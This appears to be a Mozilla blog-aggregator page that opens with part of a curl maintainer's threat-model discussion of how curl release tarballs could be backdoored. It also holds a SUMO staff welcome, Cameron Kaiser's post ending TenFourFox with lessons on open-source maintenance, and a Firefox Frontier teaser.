curl release tarballs are made by me, locally on my machine. After I’ve built the tarballs I sign them with my GPG key and upload them to the curl.se origin server for the world to download. (Web users don’t actually hit my server when downloading curl. The user visible web site and downloads are hosted by Fastly servers.)

An attacker that would infect my release scripts (which btw are also in the git repository) or do something to my machine could get something into the tarball and then have me sign it and then create the “perfect backdoor” that isn’t detectable in git and requires someone to diff the release with git in order to detect – which usually isn’t done by anyone that I know of.

But such an attacker would not only have to breach my development machine, such an infection of the release scripts would be awfully hard to pull through. Not impossible of course. I of course do my best to maintain proper login sanitation, updated operating systems and use of safe passwords and encrypted communications everywhere. But I’m also a human so I’m bound to do occasional mistakes.

Another way could be for the attacker to breach the origin download server and replace one of the tarballs there with an infected version, and hope that people skip verifying the signature when they download it or otherwise notice that the tarball has been modified. I do my best at maintaining server security to keep that risk to a minimum. Most people download the latest release, and then it’s enough if a subset checks the signature for the attack to get revealed sooner rather than later.

The further-down-the-chain method

As an attacker, get into the supply chain somewhere else: find a weaker link in the chain between the curl release tarball and the target system for your attack . If you can trick or social engineer maybe someone else along the way to get your evil curl tarball to get used there instead of the actual upstream tarball, that might be easier and give you more bang for your buck. Perhaps you target your particular distribution’s or Operating System’s release engineers and pretend to be from the curl project, make up a story and send over a tarball to help them out…

Fake a security advisory and send out a bad patch directly to someone you know build their own curl/libcurl binaries?

Better ways?

If you can think of other/better ways to get malicious code via curl code into a victim’s machine, let me know! If you find a security problem, we will reward you for it!

Similarly, if you can think of ways or practices on how we can improve the project to further increase our security I’ll be very interested. It is an ever-moving process.


Added after the initial post. Lots of people have mentioned that curl can get built with many dependencies and maybe one of those would be an easier or better target. Maybe they are, but they are products of their own individual projects and an attack on those projects/products would not be an attack on curl or backdoor in curl by my way of looking at it.

In the curl project we ship the source code for curl and libcurl and the users, the ones that builds the binaries from that source code will get the dependencies too.


Image by SeppH from Pixabay

Support.Mozilla.OrgIntoducing Daryl Alexsy

Hey everybody,

Please join us to welcome Daryl Alexsy to he Customer Experience team! Daryl is a Senior User Experience Designer who will be helping SUMO as well as the MDN team. Please, say hi to Daryl!


Here’s a short introduction from her:

Hi everyone! I’m Daryl, and I’ll be joining the SUMO team as a UX designer. I am looking forward to working together with you all to create a better experience for both readers and contributors of the platform, so please don’t hesitate to reach out with any observations or suggestions for how we can make that happen.


Welcome Daryl!

Cameron KaiserThe end of TenFourFox and what I've learned from it

Now that I have your attention.

I've been mulling TenFourFox's future for awhile now in light of certain feature needs that are far bigger than a single primary developer can reasonably embark upon, and recent unexpected changes to my employment, plus other demands on my time, have unfortunately accelerated this decision.

TenFourFox FPR32 will be the last official feature parity release of TenFourFox. (A beta will come out this week, stay tuned.) However, there are still many users of TenFourFox — the update server reports about 2,000 daily checkins on average — and while nothing has ever been owed or promised I also appreciate that many people depend on it, so there will be a formal transition period. After FPR32 is released TenFourFox will drop to security parity and the TenFourFox site will become a placeholder. Security parity means that the browser will only receive security updates plus certain critical fixes (as I define them, such as crash wallpaper, basic adblock and the font blacklist). I will guarantee security and stability patches through and including Firefox 93 (scheduled for September 7) to the best of my ability, which is also the point at which Firefox 78ESR will stop support, and I will continue to produce, generate and announce builds of TenFourFox with those security updates on the regular release schedule with chemspills as required. There will be no planned beta releases after FPR32 but Tenderapp will remain available to triage bugfixes for new changes only.

After that date, for my own use I will still make security patches backported from the new Firefox 91ESR publicly available on Github and possibly add any new features I personally need, but I won't promise these on any particular timeline, I won't make or release any builds for people to download, I won't guarantee any specific feature or fix, I won't guarantee timeliness or functionality, and there will be no more user support of any kind including on Tenderapp. I'll call this "hobby mode," because the browser will be a hobby I purely maintain for myself, with no concessions, no version tags (rolling release only), no beta test period and no regular schedule. You can still use it, but if you want to do so, you will be responsible for building the browser yourself and this gives you a few months to learn how. Also, effective immediately, there will be no further updates to TenFourFoxBox, the QuickTime Enabler, the MP4 Enabler or the TenFourFox Downloader, though you will still be able to download them.

Unless you have a patch or pull request or it's something I care about, if you open an issue on Github it will be immediately closed. Similarly, any currently open issues I don't intend to address will be wound down over the next few weeks. However, this blog and the Github wiki will still remain available indefinitely, including all the articles, and all downloads on SourceForge will remain accessible as well. I'll still post here as updates are available along with my usual occasional topics of relevance to Power Mac users.

Classilla, for its part, is entering "hobby mode" today and I will do no further official public work on it. However, I am releasing the work I've already done on 9.3.4, such as it is, plus support for using Crypto Ancienne for self-hosted TLS 1.2 if you are a Power MachTen user (or running it in Classic or under Mac OS in Rhapsody). You can read more about that on Old VCR, my companion retrocomputing blog.

I'm proud of what we've accomplished. While TenFourFox was first and foremost a browser for me personally, it obviously benefited others. It kept computers largely useable that today are over fifteen years old and many of them even older. In periods of a down economy and a global pandemic this helped people make ends meet and keep using what they had an investment in. One of my favourite reports was from a missionary in Myanmar using a beat-up G4 mini over a dialup modem; I hope he is safe during the present unrest.

I'm also proud of the fair number of TenFourFox features that were successfully backported or completely new. TenFourFox was the first and still one of the few browsers on PowerPC Mac OS X to support TLS 1.3 (or even 1.2), and we are the only such browser with a JavaScript JIT. We also finished a couple features long planned for mainline Firefox but that never made it, such as our AppleScript (and AppleScript-JavaScript bridge) support. Our implementation even lets you manipulate webpages that may not work properly to function usefully. Over the decade TenFourFox has existed we also implemented our own native date and time controls, basic ad block, advanced Reader View (including sticky and automatic features), additional media support (MP3, MP4 and WebP), additional features and syntax to JavaScript, and AltiVec acceleration in whatever various parts of the browser we could. There are also innumerable backported bug fixes throughout major portions of the browser which repair long-standing issues. All of this kept Firefox 45, our optimal platform base, useful for far longer than the sell-by date and made it an important upstream source for other legacy browsers (including, incredibly, OS/2). You can read about the technical differences in more detail.

Many people have contributed to TenFourFox and to the work above, and they're credited in the About window. Some, like Chris T, Ken Cunningham and OlgaTPark, still contribute. I've appreciated everyone's work on the source code, the localizations and their service in the user support forums. They've made the job a little easier. There are not enough thank yous for these good people.

When September rolls around, if you don't want to build the browser yourself it is possible some downstream builders like Olga may continue backports. I don't speak for them and I can't make promises on their behalf. Olga's builds run on 10.4, 10.5 and 10.6. If you choose to make your own builds and release them to users, please use a different name for your builds than TenFourFox so that I don't get bothered for support for your work (Olga has a particular arrangement with me but I don't intend to repeat it for others).

You might also consider another browser. On PowerPC 10.5 your best alternative is Leopard WebKit. It has not received recent updates but many of you use it already. I don't maintain or work on LWK, but there is some TenFourFox code in it, and Tobias has contributed to TenFourFox as well. If you don't want to use Safari specifically, LWK can be relinked against most WebKit shells including Stainless and Roccat.

If you are using TenFourFox on 10.6, you could try using Firefox Legacy, which is based on Firefox 52. It hasn't been updated in about a year but it does have a more recent platform base than official Firefox for 10.6 or TenFourFox.

However, if you are using TenFourFox on 10.4 (PowerPC or Intel), I don't have any alternative suggestions for you. I am not aware of any other vaguely modern browser that supports Tiger. Although some users have tried TenFourKit, it does not support TLS 1.1 or 1.2 (only Opera 10.63 does), and OmniWeb, Camino, Firefox 3.6 and the briefly available Tor Browser for PowerPC are now too old to recommend for any reasonable current use.

So, that's the how. Here's the why and what. I have a fairly firm rule that I don't maintain software I don't personally use. The reason for that is mostly time, since I don't have enough spare cycles to work on stuff that doesn't benefit me personally, but it's also quality: I can't maintain a quality product if I don't dogfood it myself. And my G5 has not been my daily driver for a good couple years; my daily driver is the Raptor Talos II. I do use the G5 but for certain specific purposes and not on a regular daily basis.

Additionally, I'm tired. It's long evenings coding to begin with, but actual development time is only the start of it. It's also tying up the G5 for hours to chug out the four architecture builds and debug (at least) twice a release cycle, replying to bug reports, scanning Bugzilla, reading the changelogs for security updates and keeping up with new web features in my shrinking spare time after doing the 40+-hour a week job I actually got paid for. Time, I might add, which is taken away from my other hobbies and my personal relaxation, and time which I would not need to spend if I did this purely as a hobby and never released any of it. Now that Firefox is on a four-week release schedule, it's just more than I feel I can continue to commit to and I'm neglecting the work I need to do on the system that I really do use every day.

We're running on fumes technologically as well. Besides various layout and DOM features we don't support well like CSS grid, there are large JavaScript updates we'll increasingly need which are formidably complex tasks. The biggest is async and await support which landed in Firefox 52, and which many sites now expect to run at all. However, at the time it required substantial changes to both JavaScript and the runtime environment and had lots of regressions and bugs to pick up. We have some minimal syntactic support for the feature but it covers only the simplest of use cases incompletely. There are also front end changes required to deal with certain minifiers (more about this in a moment) but they can all be traced back to a monstrous 2.5MB commit which is impossible to split up piecemeal. We could try to port 52ESR as a whole, but we would potentially suffer some significant regressions in the process, and because there is no Rust support for 32-bit PowerPC on OS X we couldn't build anything past Firefox 54 anyway. All it does is just get us that much closer to an impenetrable dead end. It pains me to say so, but it's just not worth it, especially if I, the browser's only official beneficiary, am rarely using it personally these days. It's best to hang it up here while the browser still works for most practical purposes and people can figure out their next move, rather than vainly struggling on with token changes until the core is totally useless.

Here is what I have learned working on TenFourFox and, for that matter, Classilla.

Writing and maintaining a browser engine is fricking hard and everything moves far too quickly for a single developer now. However, JavaScript is what probably killed TenFourFox quickest. For better or for worse, web browsers' primary role is no longer to view documents; it is to view applications that, by sheer coincidence, sometimes resemble documents. You can make workarounds to gracefully degrade where we have missing HTML or DOM features, but JavaScript is pretty much run or don't, and more and more sites just plain collapse if any portion of it doesn't. Nowadays front ends have become impossible to debug by outsiders and the liberties taken by JavaScript minifiers are demonstrably not portable. No one cares because it works okay on the subset of browsers they want to support, but someone bringing up the rear like we are has no chance because you can't look at the source map and no one on the dev side has interest in or time for helping out the little guy. Making test cases from minified JavaScript is an exercise in untangling spaghetti that has welded itself together with superglue all over your chest hair, worsened by the fact that stepping through JavaScript on geriatic hardware with a million event handlers like waiting mousetraps is absolute agony. With that in mind, who's surprised there are fewer and fewer minority browser engines? Are you shocked that attempts like NetSurf, despite its best intentions and my undying affection for it, are really just toys if they lack full script runtimes? Trying and failing to keep up with the scripting treadmill is what makes them infeasible to use. If you're a front-end engineer and you throw in a dependency on Sexy Framework just because you can, don't complain when you only have a minority of browser choices because you're a big part of the problem.

Infrastructure is at least as important as the software itself. A popular product incurs actual monetary costs to service it. It costs me about US$600 a month, on average, to run my home data center where Floodgap sits (about ten feet away from this chair) between network, electricity and cooling costs. TenFourFox is probably about half its traffic, so offloading what we can really reduces the financial burden, along with the trivial amount of ad revenue which basically only pays for the domain names. Tenderapp for user support, SourceForge for binary hosting, Github for project management and Blogger for bloviating are all free, along with Google Code where we originally started, which helped a great deal in making the project more sustainable for me personally even if ultimately I was shifting those ongoing costs to someone else. However, the biggest investment is time: trying to stick to a regular schedule when the ground is shifting under your feet is a big chunk out of my off hours, and given that my regular profession is highly specialized and has little to do with computing, you can't really pay me enough to dedicate my daily existence to TenFourFox or any other open-source project because I just don't scale. (We never accepted donations anyway, largely to avoid people thinking they were "buying" something.) I know some people make their entire living from free open source projects. I think those people are exceptions and noteworthy precisely because of their rarity. Most open source projects, even ones with large userbases, are black holes ultimately and always will be.

Gecko has a lot of technical baggage, but it is improving by leaps and bounds, and it is supported by an organization that has the Internet's best interests at heart. I have had an active Bugzilla account since 2004 and over those 16+ years I doubt I would have gotten the level of assistance or cooperation from anyone else that I've received from Mozilla employees and other volunteers. This is not to say that Mozilla (both MoFo and MoCo) has not made their blunders, or that I have agreed personally with everything they've done, and with respect to sustainability MoCo's revenues in particular are insufficiently diversified (speaking of black holes). But given my experience with other Mozillians and our shared values I would rather trust Mozilla any day with privacy and Web stewardship than, say, Apple, who understandably are only interested in what sells iDevices, and Google, who understandably are only interested in what improves the value proposition of their advertising platforms. And because Chrome and Chromium effectively represent the vast majority of desktop market share, Google can unilaterally drive standards and force everyone to follow. Monopolies, even natural ones, may be efficient but that doesn't make them benign. I'll always be a Firefox user for that reason and I still intend to continue contributing code.

Now for the mildly controversial part of this post and the one that will make a few people mad, but this is the end of TenFourFox, and a post-mortem must be comprehensive. For this reason I've chosen to disable comments on this entry. Here is what you should have learned from TenFourFox (much the same thing users should have learned from any open-source project where the maintainer eventually concluded it was more trouble than it was worth).

If you aren't paying for the software, then please don't be a jerk. There is a human at the other end of those complaints and unless you have a support contract, that person owes you exactly nothing. Whining is exhausting to read and "doesn't work" reports are unavoidably depressing, disparaging or jokey comments are unkind, and making reports nastier or more insistent doesn't make your request more important. This is true whether or not your request is reasonable or achievable, but it's certainly more so when it isn't.

As kindly as I can put it, not all bug reports are welcome. Many are legitimately helpful and improve the quality of the browser, and I did appreciate the majority of the reports I got, but even helpful bug reports objectively mean more work for me though it was work I usually didn't mind doing. Unfortunately, the ones that are unhelpful are at best annoying (and at worst incredibly frustrating) because they mean unhappy people with problems that may never be solvable.

The bug reports I liked least were the ones that complained about some pervasive, completely disabling flaw permeating the entire browser from top to bottom. Invariably this was that the browser "was slow," but startup crashes were probably a distant second place. The bug report would inevitably add something along the lines of this should be obvious, or talk about the symptom(s) as if everyone must be experiencing it (them).

I'm not doubting what people say they're seeing. But you should also consider that asserting the software has such a grave fault effectively alleges I either don't use the software or care about it, or I would have noticed. Most of the time my reply was to point out that my reply was being made in the browser itself, and to point out that we had regular beta phases where the alleged issue had not surfaced, so no, it must not be that pervasive, and let's figure out why your computer behaves that way. As far as the browser being slow, well, that's part personal expectation and part technical differences. TenFourFox would regularly win benchmarks against other Power Mac browsers because its JavaScript JIT would stomp everything else, but its older Mozilla branch has weaker pixelpushing and DOM that is demonstrably slower than WebKit, and no Power Mac browser is going to approach the performance you would get on an Intel Mac with any browser. Some of this is legitimate criticism, but overall if that's what you're expecting, TenFourFox will disappoint you. And it certainly did disappoint some people, who felt completely empowered to ignore all that context and say so.

Here is another unwelcome bug report, sometimes part of those same reports: "Version X+1 does something bad that Version X didn't, so I went back to Version X (or I've switched to another browser). Please let me know when it's fixed."

As a practical consideration, if you have such a serious issue where you can't use the browser for your desired purpose then I guess you do what you gotta do. But consider you may also be saying that you don't care about solving the problem. Part of it is, like the last report, making the sometimes incorrect assumption that everyone else must be seeing what you're seeing. But the other part is because you've already reverted to the previous release, you don't have any actual investment in the problem being solved. If it actually is a problem that can be fixed, and I do fix it, you're using the previous version and may or may not be in a position to test it. But if it's actually a problem I can't observe, then it won't get fixed assuming it actually does exist, because I don't see that problem on Version X+1 myself and the person who can see it, i.e., you, has bailed out. If you want me to fix it, especially if you are unwilling or unable to fix it yourself, then you need to stick with it like I'm sticking with it.

What should you do? Phrase it better. Post your reports with the attitude that you are just one user, using free software, from the humility of your own personal experience on your own system. Make it clear you don't expect anything from the report, you are grateful the software exists, you intend to keep using it and this is your small way of giving back. Say this in words because I can't see your face or hear your voice. Write "thank you" and mean it. Acknowledge the costs in time and money to bring it to you. Tell me what's good about it and what you use it for. That's how you create a relationship where I can see you as a person and not a demand request, and where you can see me as a maintainer and not a vending machine. Value my work so that I can value your insights into it. Politeness, courtesy and understanding didn't go out the window just because we're interacting through a computer screen.

Goodness knows I haven't been perfect and I've lost my temper at times with people (largely justifiably, I think, but still). All of us are only human. But today, looking back on everything that's happened, I'm still proud of TenFourFox and I'm still glad I started working on it over 10 years ago. Here's the first functional build of Firefox 4.0b7pre on Tiger (what became the first beta of TenFourFox), dated October 15, 2010:

This was back when Mozilla was sending thank-you cards to Firefox 4 beta testers:
TenFourFox survived a lot of times when I thought it was finished for one technical reason or another, and it's still good enough for the couple thousand people who use it every day and the few thousand more who use it occasionally. It kept a lot of perfectly good hardware out of landfills. And most of all, it got me years more out of my own Quad G5 and iBook G4 and it still works well enough for the times I do still need it. Would I embark upon it again, knowing everything I know now and all the work and sweat that went into it? Heck yeah. In a heartbeat.

It was worth it.

The Firefox FrontierHow one woman founder pivoted her company online while supporting small businesses

Eighteen years ago Susie Daly started Renegade Craft as a way to build a community of artists through in-person events. When COVID-19 and the corresponding shutdown put a stop to … Read more

The post How one woman founder pivoted her company online while supporting small businesses appeared first on The Firefox Frontier.